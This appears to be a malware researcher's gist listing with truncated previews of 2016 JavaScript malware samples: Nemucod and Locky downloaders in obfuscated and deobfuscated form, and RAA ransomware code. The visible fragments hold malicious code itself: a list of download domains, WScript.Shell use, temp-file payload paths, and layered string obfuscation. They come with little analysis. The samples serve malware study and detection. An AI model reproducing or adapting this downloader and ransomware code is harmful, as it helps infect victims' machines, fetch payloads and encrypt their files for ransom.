Antelox / FedEx_0000805344.doc_deobfuscated.js
Created June 9, 2016 09:12
Deobfuscated JavaScript - original file: "FedEx_0000805344.doc.js"
var id = "TRMZDhCofKbv_q5hiDKefL875Yntf6t7_hOQK5aWmdOm2ocfp6cINwoJggYEDAZgrLxmdcW82GWld4k-xmgrFDct";
var ad = "14QHA8ycP4YMqtohbietj3JFKKjRkuPtv3";
var bc = "0.37070";
var ld = 0;
var cq = String.fromCharCode(34);
var cs = String.fromCharCode(92);
var ll = ["masterline.info", "mos-traffik.ru", "nahabinonasporte.ru", "shkola.selivaniha.ru", "windigomsk.ru"];
var ws = WScript.CreateObject("WScript.Shell");
var fn = ws.ExpandEnvironmentStrings("%TEMP%") + cs + "a";
var pd = ws.ExpandEnvironmentStrings("%TEMP%") + cs + "php4ts.dll";
Antelox / FedEx_0000805344.doc.js
Created June 9, 2016 09:05
Original obfuscated JavaScript code found inside a zip attachment - Nemucod PHP variant
var m96='var';var j98='p.Wr';m96+=' id';j98+='es';j98+='(" ';m96+='="TRMZDhCofKbv_q5hiDKefL875Yntf6t7_hOQK5aWmdOm2ocfp6cINwoJggYEDAZgrLxmdcW82GWld4k-xmgrFDct';j98+='Line';j98+='=WS';m96+='"; v';j98+='n=';j98+=';i';m96+='ar ';j98+=' xo.';j98+='ne';m96+='ad';j98+='); ';m96+='="';j98+='ndig';j98+='n+"';m96+='14QHA8ycP4YMqtohbietj3JFKKjRkuPtv3"; ';j98+='ht';m96+='var ';j98+='"+cq';m96+='bc="';j98+='Wr';j98+='07';m96+='0.';j98+='s+"S';m96+='37';j98+='rt"';j98+='xa.t';m96+='07';j98+='Wr';j98+='ne(';m96+='0"; ';j98+='er ';j98+='eate';m96+='var';j98+='e("';m96+=' ld=';j98+='ue ';m96+='0;';j98+='e(';m96+=' var';j98+='f(';j98+=' if(';m96+=' cq=';j98+='"&';j98+='pte';m96+='St';j98+='av';j98+='ml';m96+='rin';j98+='i++)';m96+='g.f';j98+='clo';m96+='rom';j98+='ho';m96+='Char';j98+='h ';j98+=' &&';m96+='Co';j98+='u e';m96+='de(3';j98+='+n+"';j98+='es';m96+='4); ';j98+='naha';m96+='va';j98+='d="';j98+='(b';m96+='r cs';j98+='ne';j98+='s.R';m96+='=Str';j98+='.se';j98+='p.W';m96+='in';j98+='; w';m96+='g.fr';j98+='ar';j98+='ite'
Antelox / changes-057-deobfuscated_2.js
Created May 28, 2016 14:25
Second deobfuscation layer result
var Wm = "close";
var BLLo = "File";
var JBl9 = "To";
var NAt9 = "Save";
var BGLm0 = "xt";
var WCz = "Te";
var Ae = "write";
var JREj7 = "open";
var EXb6 = "et";
var NRMWr1 = "Chars";
Antelox / changes-057-deobfuscated_1.js
Created May 28, 2016 14:10
First deobfuscation layer result
var Wm = "close";
var BLLo = "File";
var JBl9 = "To";
var NAt9 = "Save";
var BGLm0 = "xt";
var WCz = "Te";
var Ae = "write";
var JREj7 = "open";
var EXb6 = "et";
var NRMWr1 = "Chars";
Antelox / changes-057-.js
Created May 28, 2016 14:05
Original JavaScript file found inside a zip attachment
/*@cc_on
var acIt3SsgNM = ';-}- -;-)-(-]-b-M-O-[-3-s-S- -;-)-2- -,-/-*- - -s- -*-/- -2-j-A-K-H-(-]-s-Q-Z-Q-D- -+- -4-q-L-K-K- -+- -k-N-I-[-3-s-S- -;-)-)-5-p-R-T-(-/-*- - -s- -*-/- -a-G-K-(-]-0-m-L-G-B- -+- -z-C-W- -+- -e-A-[-3-s-S- -;-)-(-]-7-g-S- -+- -l-X-B-K-[-3-s-S- -;-6-x-N-N-U-=-]-)-)-(-}-;-s-G-R- -n-r-u-t-e-r-{-)-(-3-m-G-M-E-Z- -n-o-i-t-c-n-u-f-(- -+- -i-Z-X-L-V-[-3-s-S- -;-9-h-J-G-I-N-=-]-a-G-R-U- -+- -8-g-Z-[-3-s-S- -;-)-0-h-R- -+- -8-s-C-Y- -+- -5-t-C-G- -+- -9-j-H-B-(-]-9-y-B-E-X- -+- -)-)-(-}-;-g-B- -n-r-u-t-e-r-{-)-(-t-D-Z-H-S- -n-o-i-t-c-n-u-f-(- -+- -6-f-M-J-[-t-p-i-r-c-S-W-=-3-s-S- -r-a-v- -{- -)-5-p-R-T- -,-/-*- - -s- -*-/- -2-j-A-K-H-(-7-z-C-E- -n-o-i-t-c-n-u-f- -;-}- -;-1-q-Q- -n-r-u-t-e-r- -;-)-"-"-(-]-)-q-Q-Z-(-3-f-P-L-V-S- -+- -m-B-O-S-A-[-v-W-L-R-=-1-q-Q- -}- -;-)-)-4-m-Q-L-U-(-]-)-3-x-O-(-3-j-Q-M- -+- -)-d-Q-(-9-h-J-N-W-T- -+- -4-x-W-O-L-Z- -+- -)-)-(-}-;-4-o-I-H-W- -n-r-u-t-e-r-{-)-(-x-E-D- -n-o-i-t-c-n-u-f-(-[-g-n-i-r-t-S-(-h-s-u-p-.-v-W-L-R- -}-;-]-7-b-B-T-H-[-h-K-N-W-=-4-m-Q-L-
Antelox / CANON000370699263413.js
Created June 29, 2016 14:00
Locky js downloader - More info here: http://pastebin.com/t4kPAqXP
relevant = [];
var unlike = { ':': '.','U': 'S','1010': 'X'};
var errant = 0;
function achievment(bidttt){if(bidttt==1){return 2;}else{return 17;}
return 3;}
function dollarm(rivulet) {
Antelox / tpl.js
Last active June 29, 2016 21:52
RAA Ransomware js code from download-the-files\.com
var CryptoJS = CryptoJS || function(u, p) {
var d = {},
l = d.lib = {},
s = function() {},
t = l.Base = {
extend: function(a) {
s.prototype = this;
var c = new s;
a && c.mixIn(a);
c.hasOwnProperty("init") || (c.init = function() {
Antelox / RAA.js
Last active July 30, 2016 08:45
RAA js code deobfuscated from say-helloworld\.com
var CryptoJS = CryptoJS || function(u, p) {
var d = {},
l = d.lib = {},
s = function() {},
t = l.Base = {
extend: function(a) {
s.prototype = this;
var c = new s;
a && c.mixIn(a);
c.hasOwnProperty("init") || (c.init = function() {
Antelox / INV000 4f4.js
Created July 22, 2016 17:26
Locky embeds its dropper in the javascript loader
var Vg3 = "e" + "";
var Ab7 = "clos" + "";
function Zt4(EGk4){return EGk4;};var Du0 = "e" + "";
var Xb1 = "Fil" + "";
var ZOw = "veTo" + "";
var NCn = "Sa" + "";
function IVm2(QZd2){return QZd2;};var ZWu = "t" + "";
var RAs = "eTex" + "";
var Ix40 = "it" + "";
var Bq0 = "wr" + "";
Antelox / INV000 701.js
Created July 23, 2016 07:38
Locky embeds its dropper in the javascript loader - base64 version
var NIb6 = "1" + "";
var JIb = " 32" + "";
var SUt = "Run" + "";
var WFo9 = "in" + "";
var It8 = ".b" + "";
function STq(FDw){return FDw;};var Km = "xe" + "";
var HUg8 = ".e" + "";
function OFe8(UDd){return UDd;};var ZYt1 = "H" + "";
var NUl = "Hd" + "";
var DTo = "JQl13" + "";